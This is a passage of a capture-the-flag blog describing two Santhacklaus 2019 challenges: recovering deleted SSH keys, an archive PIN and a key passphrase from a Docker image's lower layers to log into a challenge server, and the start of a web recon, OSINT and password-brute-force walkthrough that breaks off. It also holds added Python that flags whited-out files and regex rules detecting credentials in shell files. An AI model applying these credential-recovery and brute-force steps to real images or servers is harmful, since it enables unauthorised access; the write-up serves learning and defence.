<missing> <span class="m">11</span> days ago /bin/sh -c <span class="nv">ARCH</span><span class="o">=</span> <span class="o">&&</span> <span class="nv">dpkgArch</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>dpkg --print-architecture<span class="k">)</span><span class="s2">"</span> <span class="o">&&</span> <span class="k">case</span> <span class="s2">"</span><span class="si">${</span><span class="nv">dpkgArch</span><span class="p">##*-</span><span class="si">}</span><span class="s2">"</span> in amd64<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'x64'</span><span class="p">;;</span> ppc64el<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'ppc64le'</span><span class="p">;;</span> s390x<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'s390x'</span><span class="p">;;</span> arm64<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'arm64'</span><span class="p">;;</span> armhf<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'armv7l'</span><span class="p">;;</span> i386<span class="o">)</span> <span class="nv">ARCH</span><span class="o">=</span><span class="s1">'x86'</span><span class="p">;;</span> *<span class="o">)</span> <span class="nb">echo</span> <span class="s2">"unsupported architecture"</span><span class="p">;</span> <span class="nb">exit</span> <span class="m">1</span> <span class="p">;;</span> <span class="k">esac</span> <span class="o">&&</span> curl -fsSLO --compressed <span class="s2">"https://nodejs.org/dist/v</span><span class="nv">$NODE_VERSION</span><span class="s2">/node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> <span class="o">&&</span> curl -fsSLO --compressed <span 
class="s2">"https://nodejs.org/dist/v</span><span class="nv">$NODE_VERSION</span><span class="s2">/SHASUMS256.txt.asc"</span> <span class="o">&&</span> tar -xJf <span class="s2">"node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> -C /usr/local --strip-components<span class="o">=</span><span class="m">1</span> --no-same-owner <span class="o">&&</span> rm <span class="s2">"node-v</span><span class="nv">$NODE_VERSION</span><span class="s2">-linux-</span><span class="nv">$ARCH</span><span class="s2">.tar.xz"</span> SHASUMS256.txt.asc <span class="m">67</span>.2MB
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) COPY dir:795933707ce316a3189ec6fd11f015b1acbc4eae6d5f01185625a86edaa2c5c4 in / 18.6kB </span>
<missing> <span class="m">11</span> days ago /bin/sh -c <span class="c1">#(nop) ENV NODE_VERSION=12.13.1 0B </span>
<missing> <span class="m">11</span> days ago /bin/sh -c groupadd --gid <span class="m">1000</span> node <span class="o">&&</span> useradd --uid <span class="m">1000</span> --gid node --shell /bin/bash --create-home node 333kB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="nb">set</span> -ex<span class="p">;</span> apt-get update<span class="p">;</span> apt-get install -y --no-install-recommends autoconf automake bzip2 dpkg-dev file g++ gcc imagemagick libbz2-dev libc6-dev libcurl4-openssl-dev libdb-dev libevent-dev libffi-dev libgdbm-dev libglib2.0-dev libgmp-dev libjpeg-dev libkrb5-dev liblzma-dev libmagickcore-dev libmagickwand-dev libmaxminddb-dev libncurses5-dev libncursesw5-dev libpng-dev libpq-dev libreadline-dev libsqlite3-dev libssl-dev libtool libwebp-dev libxml2-dev libxslt-dev libyaml-dev make patch unzip xz-utils zlib1g-dev <span class="k">$(</span> <span class="k">if</span> apt-cache show <span class="s1">'default-libmysqlclient-dev'</span> <span class="m">2</span>>/dev/null <span class="p">|</span> grep -q <span class="s1">'^Version:'</span><span class="p">;</span> <span class="k">then</span> <span class="nb">echo</span> <span class="s1">'default-libmysqlclient-dev'</span><span class="p">;</span> <span class="k">else</span> <span class="nb">echo</span> <span class="s1">'libmysqlclient-dev'</span><span class="p">;</span> <span class="k">fi</span> <span class="k">)</span> <span class="p">;</span> rm -rf /var/lib/apt/lists/* 562MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c apt-get update <span class="o">&&</span> apt-get install -y --no-install-recommends bzr git mercurial openssh-client subversion procps <span class="o">&&</span> rm -rf /var/lib/apt/lists/* 142MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="nb">set</span> -ex<span class="p">;</span> <span class="k">if</span> ! <span class="nb">command</span> -v gpg > /dev/null<span class="p">;</span> <span class="k">then</span> apt-get update<span class="p">;</span> apt-get install -y --no-install-recommends gnupg dirmngr <span class="p">;</span> rm -rf /var/lib/apt/lists/*<span class="p">;</span> <span class="k">fi</span> <span class="m">7</span>.81MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c apt-get update <span class="o">&&</span> apt-get install -y --no-install-recommends ca-certificates curl netbase wget <span class="o">&&</span> rm -rf /var/lib/apt/lists/* <span class="m">23</span>.2MB
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="c1">#(nop) CMD ["bash"] 0B </span>
<missing> <span class="m">5</span> weeks ago /bin/sh -c <span class="c1">#(nop) ADD file:152359c10cf61d80091bfd19e7e1968a538bebebfa048dca0386e35e1e999730 in / 101MB</span>
</code></pre></div>
<p>Ah! Finally some interesting things surface. Read it from the bottom up. The first commands update the system and install the dependencies. What follows is more interesting:</p>
<div class="highlight"><pre><span></span><code>/bin/sh -c ln -s /usr/local/bin/node /usr/local/bin/nodejs <span class="o">&&</span> rm /home/node/.bashrc /home/node/.bash_history <span class="o">&&</span> rm -rf /usr/share/prod-common
</code></pre></div>
<p>We notice the deletion of two files and one directory. Since each image layer is immutable, a <code>rm</code> in a later layer only hides the files from the merged view; the lower layer still holds their bytes. So let's see how we can recover their contents :).</p>
<p>Searching for documentation online, we come across this Medium article: https://medium.com/@jessgreb01/digging-into-docker-layers-c22f948ed612. It talks about a <code>/var/lib/docker/aufs</code> directory. However, that directory doesn't exist on my server:</p>
<div class="highlight"><pre><span></span><code>$ ls /var/lib/docker -l
total <span class="m">48</span>
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 builder
drwx--x--x <span class="m">4</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 buildkit
drwx------ <span class="m">4</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 containers
drwx------ <span class="m">3</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 image
drwxr-x--- <span class="m">3</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 network
drwx------ <span class="m">35</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 overlay2
drwx------ <span class="m">4</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 plugins
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Dec <span class="m">21</span> <span class="m">18</span>:26 runtimes
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 swarm
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Dec <span class="m">30</span> <span class="m">17</span>:21 tmp
drwx------ <span class="m">2</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:43 trust
drwx------ <span class="m">5</span> root root <span class="m">4096</span> Sep <span class="m">27</span> <span class="m">14</span>:48 volumes
</code></pre></div>
<p>However, an <code>overlay2</code> directory is present, and it is mentioned at the end of the article as a possible successor to AUFS. We check which one Docker uses:</p>
<div class="highlight"><pre><span></span><code>$ docker info
Client:
Debug Mode: <span class="nb">false</span>
Server:
Containers: <span class="m">2</span>
Running: <span class="m">1</span>
Paused: <span class="m">0</span>
Stopped: <span class="m">1</span>
Images: <span class="m">2</span>
Server Version: <span class="m">19</span>.03.5
Storage Driver: overlay2
</code></pre></div>
<p>OK, so we know we need to look at <code>overlay2</code> rather than <code>AUFS</code>. The page in the official Docker documentation explains how it works: https://docs.docker.com/storage/storagedriver/overlayfs-driver/#how-the-overlay2-driver-works.</p>
<p>We therefore need to find the <code>prod-common</code> directory as well as the two files <code>.bashrc</code> and <code>.bash_history</code> in this set of directories. A <code>find</code> and it's done :):</p>
<div class="highlight"><pre><span></span><code>$ find . -name <span class="s2">".bash_history"</span> <span class="p">|</span> grep node
./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history
$ wc -l ./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history
wc: ./71f44852a81b6d28dbf5c6d8d0d64857aa9d00ed5b647c4471c2e3df27cb5855/diff/home/node/.bash_history: No such device or address
$ wc -l ./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
<span class="m">153</span> ./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
</code></pre></div>
<p>BINGO! We found the directory containing the files we were looking for. The other hit, the one <code>wc</code> could not read ("No such device or address"), is the layer that deleted the file: overlay2 records a deletion as a 0:0 character device (a whiteout), not as file contents. A <code>tree</code> on the directory confirms it:</p>
<div class="highlight"><pre><span></span><code>$ tree -a
.
├── home
│   └── node
│       ├── .bash_history
│       └── .bashrc
└── usr
    └── share
        └── prod-common
            ├── dev_081219_backup.zip
            ├── dev_091219_backup.zip
            ├── dev_101219_backup.zip
            ├── dev_111219_backup.zip
            ├── dev_121219_backup.zip
            ├── dev_131219_backup.zip
            ├── dev_141219_backup.zip
            ├── dev_151219_backup.zip
            └── dev_161219_backup.zip
<span class="m">5</span> directories, <span class="m">11</span> files
</code></pre></div>
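<p>The two observations above, the <code>rm</code> step in <code>docker history</code> and the files that survive in the lower layer's diff directory, can be checked mechanically. The following Python is an added example, not code from the challenge or from this blog: it reads the <code>docker save</code> tar form of an image (where a deletion is a <code>.wh.</code> whiteout entry; the on-disk overlay2 diff directories seen above record the same thing as 0:0 character devices), reports every path that a lower layer added and a higher layer whited out, and flags RUN steps whose command deletes files. The layer contents, history lines and <code>&lt;placeholder&gt;</code> file ids are a constructed sample modelled on the page, not the real image.</p>

```python
"""Report files a later image layer deleted after a lower layer added them.
Added example, not the challenge's or the blog's code. It reads the `docker save` tar
form of an image, where a deletion is a `.wh.<name>` whiteout entry in the layer that
removed it (overlay2 diff dirs on disk record the same thing as 0:0 char devices)."""
import io
import json
import os
import re
import tarfile
import tempfile

WHITEOUT_PREFIX = ".wh."
OPAQUE_MARKER = ".wh..wh..opq"  # hides everything below its directory
# Filename fragments worth a second look when whited out later (heuristic).
SENSITIVE_HINTS = (".bash_history", ".bashrc", "id_", ".pem", ".env", "backup", ".zip", "key")
# A RUN step that deletes files only adds a whiteout layer; the bytes stay below.
CLEANUP_RX = re.compile(r"\b(rm|shred|unlink)\b")

# Constructed sample layers (tar member names, base first) modelled on the image above:
# working files land in layer 1, a cleanup step whites them out in layer 3.
DEMO_LAYERS = [
    ["bin/sh", "etc/passwd"],
    ["home/node/.bash_history", "home/node/.bashrc",
     "usr/share/prod-common/dev_081219_backup.zip",
     "usr/share/prod-common/dev_141219_backup.zip"],
    ["home/node/server.js", "home/node/package.json"],
    ["home/node/.wh..bash_history", "home/node/.wh..bashrc", "usr/share/.wh.prod-common"],
]
# Constructed sample of `docker history --format '{{.CreatedBy}}'` lines, oldest first.
DEMO_HISTORY = [
    "/bin/sh -c #(nop) ADD file:<placeholder> in /",
    "/bin/sh -c groupadd --gid 1000 node && useradd --uid 1000 --gid node node",
    "/bin/sh -c ln -s /usr/local/bin/node /usr/local/bin/nodejs && rm /home/node/.bashrc"
    " /home/node/.bash_history && rm -rf /usr/share/prod-common",
    "/bin/sh -c #(nop) COPY file:<placeholder> in /home/node/",
]

def _norm(name):
    return (name[2:] if name.startswith("./") else name).rstrip("/")

def find_shadowed_files(layers):
    """[(layer_added, layer_deleted, path)] for every path a lower layer added and a
    higher layer whited out, directly or through a parent directory."""
    added_in = {}  # path -> index of the layer that last added it
    findings = []
    for idx, names in enumerate(layers):
        for raw in names:
            name = _norm(raw)
            dirname, base = os.path.split(name)
            if base == OPAQUE_MARKER:
                hidden = dirname + "/" if dirname else ""
            elif base.startswith(WHITEOUT_PREFIX):
                target = os.path.join(dirname, base[len(WHITEOUT_PREFIX):])
                if target in added_in:
                    findings.append((added_in.pop(target), idx, target))
                hidden = target + "/"
            else:
                added_in[name] = idx
                continue
            for path in [p for p in added_in if p.startswith(hidden)]:
                findings.append((added_in.pop(path), idx, path))
    return findings

def looks_sensitive(path):
    return any(hint in os.path.basename(path).lower() for hint in SENSITIVE_HINTS)

def flag_cleanup_steps(created_by):
    """Indexes of real RUN steps (not #(nop) metadata) whose command deletes files."""
    return [i for i, s in enumerate(created_by) if "#(nop)" not in s and CLEANUP_RX.search(s)]

def load_layers_from_image_tar(image_tar_path):
    """Read a `docker save` tarball; manifest.json lists the layer tars base-first."""
    layers = []
    with tarfile.open(image_tar_path) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_path in manifest[0]["Layers"]:
            with tarfile.open(fileobj=image.extractfile(layer_path)) as layer:
                layers.append(layer.getnames())
    return layers

def _add_bytes(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

def demo_roundtrip():
    """Write DEMO_LAYERS as a docker-save style tarball (empty files) and read it back."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "demo_image.tar")
        layer_paths = []
        with tarfile.open(path, "w") as image:
            for i, names in enumerate(DEMO_LAYERS):
                buf = io.BytesIO()
                with tarfile.open(fileobj=buf, mode="w") as layer:
                    for name in names:
                        _add_bytes(layer, name, b"")
                layer_paths.append(f"layer{i}/layer.tar")
                _add_bytes(image, layer_paths[-1], buf.getvalue())
            _add_bytes(image, "manifest.json", json.dumps([{"Layers": layer_paths}]).encode())
        return load_layers_from_image_tar(path)

if __name__ == "__main__":
    for added, deleted, path in find_shadowed_files(demo_roundtrip()):
        mark = "  <-- bytes still in lower layer" if looks_sensitive(path) else ""
        print(f"layer {added} added, layer {deleted} whited out: {path}{mark}")
    print("cleanup RUN steps:", flag_cleanup_steps(DEMO_HISTORY))
```

<p>Against a real image, run <code>docker save santactf/app:latest -o app.tar</code> and pass the tarball to <code>load_layers_from_image_tar</code>. A hit on a sensitive path means the bytes are still extractable from that lower layer's tar, so the fix is to rebuild the image so the file never enters a layer (multi-stage build or build-time secrets), not to <code>rm</code> it in a later step.</p>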
<p>The zip files in the <code>prod-common</code> directory may point the way to connecting to the production server. The <code>zipinfo</code> command will give us information about their contents:</p>
<div class="highlight"><pre><span></span><code>$ zipinfo usr/share/prod-common/dev_081219_backup.zip
Archive: usr/share/prod-common/dev_081219_backup.zip
Zip file size: <span class="m">1290</span> bytes, number of entries: <span class="m">2</span>
-rw------- <span class="m">3</span>.0 unx <span class="m">821</span> TX defN <span class="m">19</span>-Dec-18 <span class="m">21</span>:31 id_santa_production
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">296</span> TX defN <span class="m">19</span>-Dec-18 <span class="m">21</span>:31 id_santa_production.pub
<span class="m">2</span> files, <span class="m">1117</span> bytes uncompressed, <span class="m">872</span> bytes compressed: <span class="m">21</span>.9%
</code></pre></div>
<p>Perfect. SSH keys (public and private) to access it. So we extract the contents:</p>
<div class="highlight"><pre><span></span><code>$ unzip dev_081219_backup.zip
Archive: dev_081219_backup.zip
<span class="o">[</span>dev_081219_backup.zip<span class="o">]</span> id_santa_production password:
</code></pre></div>
<p>It couldn't be that easy :(. Let's see whether we can find hints, or even the password itself, in one of the two other files we recovered. A search for <code>pass</code> across both files may put us on the right track:</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'pass'</span> .
./.bash_history:49:vncpasswd
./.bash_history:50:vncpasswd -type
./.bash_history:54:vncpasswd -type Password
./.bash_history:55:vncpasswd -type <span class="s2">"Password"</span>
./.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
$ grep -rHin <span class="s1">'ARCHIVE_PIN'</span> .
./.bash_history:61:export <span class="nv">ARCHIVE_PIN</span><span class="o">=</span><span class="m">25362</span>
./.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
</code></pre></div>
<p>And it does. We have the PIN code for the archive, but we don't know which archive this PIN belongs to. So we can try it on all of them with the <code>find</code> command:</p>
<div class="highlight"><pre><span></span><code>$ find usr/share/prod-common -exec unzip -P <span class="s2">"25362"</span> <span class="o">{}</span> <span class="se">\;</span>
unzip: cannot find or open ., ..zip or ..ZIP.
Archive: ./dev_081219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_131219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_151219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_161219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_141219_backup.zip
inflating: id_santa_production
inflating: id_santa_production.pub
Archive: ./dev_121219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_091219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_101219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_111219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
$ ls -l
<span class="o">[</span>...<span class="o">]</span>
-rw------- <span class="m">1</span> root root <span class="m">821</span> Dec <span class="m">18</span> <span class="m">21</span>:31 id_santa_production
-rw-r--r-- <span class="m">1</span> root root <span class="m">296</span> Dec <span class="m">18</span> <span class="m">21</span>:31 id_santa_production.pub
</code></pre></div>
<p>Perfect. We do have the keys. But we still don't have the SSH command to connect. As with the PIN, a <code>grep</code> is enough to find the information.</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'ssh'</span> home/node/
.bash_history:56:sudo nano /etc/ssh/sshd_config
.bash_history:57:sudo service restart ssh
.bash_history:58:sudo service ssh restart
.bash_history:62:ls ~/.ssh
.bash_history:64:ssh-keygen -t rsa -C jmding0714@gmail.com
.bash_history:65:cd ~/.ssh/
.bash_history:129:nano ~/.ssh/authorized_keys
.bash_history:130:ssh -p <span class="m">5700</span> rudolf-the-reindeer@46.30.204.47
</code></pre></div>
<p>We can now try to connect with the key and the information found:</p>
<div class="highlight"><pre><span></span><code>$ ssh -p <span class="m">5700</span> -i usr/share/prod-common/id_santa_production rudolf-the-reindeer@46.30.204.47
Enter passphrase <span class="k">for</span> key <span class="s1">'usr/share/prod-common/id_santa_production'</span>:
</code></pre></div>
<p>Right. Another password to find. It couldn't be that simple :(. So we go back to searching with <code>grep</code>:</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'password'</span> home/node/
home/node/.bash_history:54:vncpasswd -type Password
home/node/.bash_history:55:vncpasswd -type <span class="s2">"Password"</span>
home/node/.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
$ grep -rHin <span class="s1">'pwd'</span> home/node/
home/node/.bash_history:78:pwd
home/node/.bashrc:68: <span class="nb">export</span> <span class="nv">PRD_PWD</span><span class="o">=</span><span class="s1">'HoHoHo2020!NorthPole'</span>
</code></pre></div>
<p>And once again, a win for <code>grep</code>!</p>
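<p>The <code>grep</code> passes above over <code>.bash_history</code> and <code>.bashrc</code> can be turned into a small rule set so that recovered shell files are always checked the same way. The script below is an added example, not the challenge's or the blog's code; its sample lines are constructed in the style of the recovered files, with placeholder hosts and values, and each finding redacts the secret itself so the report can be shared.</p>

```python
"""Scan recovered shell history/rc files for credentials and access hints.
Added example, not the challenge's or the blog's code: a rule set doing what the
page's grep calls do by hand, with the secret value redacted in the output."""
import re

# Constructed sample (path, line number, text) triples in the style of the recovered
# ~/.bash_history and ~/.bashrc; hosts and values are placeholders.
SAMPLE_LINES = [
    ("home/node/.bash_history", 61, "export ARCHIVE_PIN=12345"),
    ("home/node/.bash_history", 64, "ssh-keygen -t rsa -C dev@example.invalid"),
    ("home/node/.bash_history", 115, 'zip --password "$ARCHIVE_PIN" "$PRODUCTION_BACKUP_FILE" id_prod*'),
    ("home/node/.bash_history", 130, "ssh -p 2222 deploy@prod.example.invalid"),
    ("home/node/.bashrc", 68, "export PRD_PWD='placeholder-passphrase'"),
    ("home/node/.bashrc", 70, "export PATH=$PATH:/usr/local/bin"),
]

# (label, regex). Group 1 of the first rule is the variable name; its value is redacted.
# The command-line rule deliberately matches only `--password`/`-P` (zip/unzip style),
# not lowercase `-p`, which is a port for ssh.
RULES = [
    ("exported credential", re.compile(r"^\s*export\s+(\w*(?:PASS|PWD|PIN|SECRET|TOKEN|KEY)\w*)=", re.I)),
    ("password on command line", re.compile(r"(?:--password|-P)\s+\S+")),
    ("key generation", re.compile(r"\bssh-keygen\b")),
    ("remote login target", re.compile(r"^\s*ssh\s.*\S+@\S+")),
]

def scan_shell_lines(lines):
    """Return (path, lineno, label, evidence) for every rule that fires on a line."""
    findings = []
    for path, lineno, text in lines:
        for label, rx in RULES:
            m = rx.search(text)
            if not m:
                continue
            if label == "exported credential":
                evidence = f"export {m.group(1)}=<redacted>"
            elif label == "password on command line":
                evidence = text[:m.start()] + m.group(0).split()[0] + " <redacted>" + text[m.end():]
            else:
                evidence = text
            findings.append((path, lineno, label, evidence))
    return findings

def read_shell_file(path):
    """Turn a real file into (path, lineno, text) triples for scan_shell_lines."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [(path, n, line.rstrip("\n")) for n, line in enumerate(fh, 1)]

if __name__ == "__main__":
    for path, lineno, label, evidence in scan_shell_lines(SAMPLE_LINES):
        print(f"{path}:{lineno}: {label}: {evidence}")
```

<p>Run it over the files pulled out of a layer directory with <code>scan_shell_lines(read_shell_file("home/node/.bashrc"))</code>; the same rules also suit a CI check on repositories that ship shell rc files into an image.</p>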
<p>We run our <code>ssh</code> command again:</p>
<div class="highlight"><pre><span></span><code>$ ssh -p <span class="m">5700</span> -i usr/share/prod-common/id_santa_production rudolf-the-reindeer@46.30.204.47
Enter passphrase <span class="k">for</span> key <span class="s1">'usr/share/prod-common/id_santa_production'</span>:
___ _ _ _ _____ _ ___ _____ ___
/ __<span class="p">|</span> /_<span class="se">\ </span><span class="p">|</span> <span class="se">\|</span> <span class="p">|</span>_ _/_<span class="se">\ </span> / __<span class="p">|</span>_ _<span class="p">|</span> __<span class="p">|</span>
<span class="se">\_</span>_ <span class="se">\/</span> _ <span class="se">\|</span> .<span class="sb">`</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>/ _ <span class="se">\ </span> <span class="p">|</span> <span class="o">(</span>__ <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _<span class="p">|</span>
<span class="p">|</span>___/_/ <span class="se">\_\_</span><span class="p">|</span><span class="se">\_</span><span class="p">|</span> <span class="p">|</span>_/_/ <span class="se">\_\ </span> <span class="se">\_</span>__<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>
Well <span class="k">done</span>, the flag is SANTA<span class="o">{</span>NeverTrustDockerImages7263<span class="o">}</span>
You may now log out of this server with <span class="s2">"exit"</span>
-bash-5.0$
</code></pre></div>
<p>And that's the FLAG!</p>
<p><img alt="https://i.giphy.com/media/VQ77RNKX0nyaA/giphy.webp" src="https://i.giphy.com/media/VQ77RNKX0nyaA/giphy.webp"></p>
<p>A very good challenge for discovering and better understanding how Docker works. Thanks <3.</p>
Santhacklaus 2019 - witchehh's blog 2019-12-29T00:00:00+01:00 2019-12-29T00:00:00+01:00 nlegall tag:blog.nlegall.fr,2019-12-29:/santhacklaus-2019-witchehhs-blog.html
<div class="highlight"><pre><span></span><code>Hey !
I just find this new blog post that gives some very good advices on how to protect your life by using a strong password.
http://46.30.204.44:1000/
</code></pre></div>
<p>This is a blog by a certain witchehh giving advice on creating passwords.</p>
<p><img alt="witchehh1.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh1.png"></p>
<p>On peut s'y inscrire et se connecter. On a alors une page indiquant que d'autres fonctionnalités arriveront bientôt.</p>
<p>Having no further information, we start reconnaissance on the site.</p>
<div class="highlight"><pre><span></span><code>$ nikto -host http://46.30.204.44:1000/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: <span class="m">46</span>.30.204.44
+ Target Hostname: <span class="m">46</span>.30.204.44
+ Target Port: <span class="m">1000</span>
+ Start Time: <span class="m">2019</span>-12-29 <span class="m">21</span>:05:07 <span class="o">(</span>GMT1<span class="o">)</span>
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 <span class="o">(</span>Debian<span class="o">)</span>
+ Retrieved x-powered-by header: PHP/7.2.25
+ <span class="o">[</span>...<span class="o">]</span>
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ <span class="m">8348</span> requests: <span class="m">0</span> error<span class="o">(</span>s<span class="o">)</span> and <span class="m">12</span> item<span class="o">(</span>s<span class="o">)</span> reported on remote host
+ End Time: <span class="m">2019</span>-12-29 <span class="m">21</span>:06:44 <span class="o">(</span>GMT1<span class="o">)</span> <span class="o">(</span><span class="m">97</span> seconds<span class="o">)</span>
---------------------------------------------------------------------------
+ <span class="m">1</span> host<span class="o">(</span>s<span class="o">)</span> tested
$ dirb http://46.30.204.44:1000
<span class="o">[</span>...<span class="o">]</span>
---- Scanning URL: http://46.30.204.44:1000/ ----
+ http://46.30.204.44:1000/cgi-bin/ <span class="o">(</span>CODE:403<span class="p">|</span>SIZE:279<span class="o">)</span>
<span class="o">==</span>> DIRECTORY: http://46.30.204.44:1000/img/
+ http://46.30.204.44:1000/index.php <span class="o">(</span>CODE:200<span class="p">|</span>SIZE:5039<span class="o">)</span>
+ http://46.30.204.44:1000/server-status <span class="o">(</span>CODE:403<span class="p">|</span>SIZE:279<span class="o">)</span>
---- Entering directory: http://46.30.204.44:1000/img/ ----
<span class="o">(</span>!<span class="o">)</span> WARNING: Directory IS LISTABLE. No need to scan it.
<span class="o">(</span>Use mode <span class="s1">'-w'</span> <span class="k">if</span> you want to scan it anyway<span class="o">)</span>
-----------------
END_TIME: Sun Dec <span class="m">29</span> <span class="m">21</span>:06:10 <span class="m">2019</span>
DOWNLOADED: <span class="m">4612</span> - FOUND: <span class="m">3</span>
</code></pre></div>
<p>We don't see much beyond the directory listing (<code>indexof</code>) enabled on the <code>img</code> folder. Perhaps it can give us hints about his password.</p>
<p><img alt="witchehh3.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh3.png"></p>
<p>The images are those of the home page, except for this one:</p>
<p><img alt="port2000.jpg" src="https://blog.nlegall.fr/images/santhacklaus/port2000.jpg"></p>
<p>Port 2000... Maybe the rest of the challenge is on port 2000 of the same IP. We connect and get this:</p>
<div class="highlight"><pre><span></span><code>$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : username
This account does not exist
$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : witchehh
Password :
Wrong Password !
</code></pre></div>
<p>Well, this is surely for later, but it is useless without the password.</p>
<h2>OSINT</h2>
<p>So we went fishing for information on this <code>Billy Délivre</code>. We can find an Instagram and a Facebook account. His Facebook profile being more complete, we keep that one:</p>
<p><img alt="witchehh2.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh2.png"></p>
<p>We see movie posters, music, various characters, and an image presenting his blog.</p>
<p>Besides the article, the latter contains a hash and the beginning of what could be the password associated with that hash.</p>
<div class="highlight"><pre><span></span><code>$ hashid 90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d
Analyzing <span class="s1">'90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d'</span>
<span class="o">[</span>+<span class="o">]</span> SHA-384
<span class="o">[</span>+<span class="o">]</span> SHA3-384
<span class="o">[</span>+<span class="o">]</span> Skein-512<span class="o">(</span><span class="m">384</span><span class="o">)</span>
<span class="o">[</span>+<span class="o">]</span> Skein-1024<span class="o">(</span><span class="m">384</span><span class="o">)</span>
</code></pre></div>
<p>Well. So two options are open to us: brute force with a dictionary generated from the information gathered, or check whether this hash is already present somewhere on the net.</p>
<h3>Bruteforce</h3>
<p>We have a possible structure stated on his site (<code>[mot][séparateur][nombre][séparateur][mot]</code>, i.e. word, separator, number, separator, word) and the possible beginning of the first word: <code>annec</code>. From the earlier OSINT, we can conclude that the first word is <code>annecy</code>.</p>
<p>So we need to find the separators and the number, along with the last word. To save time, a simple Python loop over our word list is enough to generate our dictionary (<a href="https://gist.github.com/Darkitty/cdb41e5e47dd6aa368a4dab950286ef2">list</a>):</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
